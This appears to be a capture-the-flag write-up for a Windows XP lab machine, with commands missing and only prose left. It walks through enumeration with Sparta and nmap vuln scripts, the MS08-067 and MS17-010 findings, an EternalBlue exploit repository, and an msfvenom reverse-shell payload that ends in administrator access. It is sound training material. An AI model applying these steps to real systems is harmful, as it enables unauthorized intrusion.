In this writeup we’ll start with Sparta, a tool for automatic enumeration.
I usually run Sparta after the first nmap scan, in order to get more information in a very fast manner. Sparta launchs nmap and other tools like Nikto after discovering a port compatible with that particular tool (port 80 or 443 in Nikto case).
as we can see not so much options except smb protocol.
The other important thing is that we discovered the target os (Windows XP).
No shares seems to be available on the machine. No anonymous login allowed.
It’s time to get more into enumeration. Nmap has many vuln NSE script that can make easier our enumeration phase.
locate the scripts with:
let’s lanch vuln script against our target on port 445.
there are two BIG vulns, the first one related to ms08-67 an old vuln discovered in 2008. Is possible to solve this with metasploit (I don’t want to do this). For those who are studying for the OSCP it nice to avoid the use of metasploit and is not always easy to discover how to solve machines without this tool.
The other discovered vulnerability is on SMBv1 server (ms17-010) that is the vuln that allowed the spred of the wannacry ransomware in 2017.
let’s try to exploit this
This page https://github.com/helviojunior/MS17-010 collects a lot of different exploits related to the EternalBlue vulns.
This particular exploit was tested on XP
the python script asks for IP and the executable file. So, if we generate the malicious file we cand send it to the victim and we have RCE.
create the payload with msfvenom
were X.X.X.X is the attacking machine address in order to receive the reverse shell. Open a listener on port 443 and launch the command:
with systeminfo we can discover information of our target
we are able to reach the administrator\Desktop folder so we are root on the machine.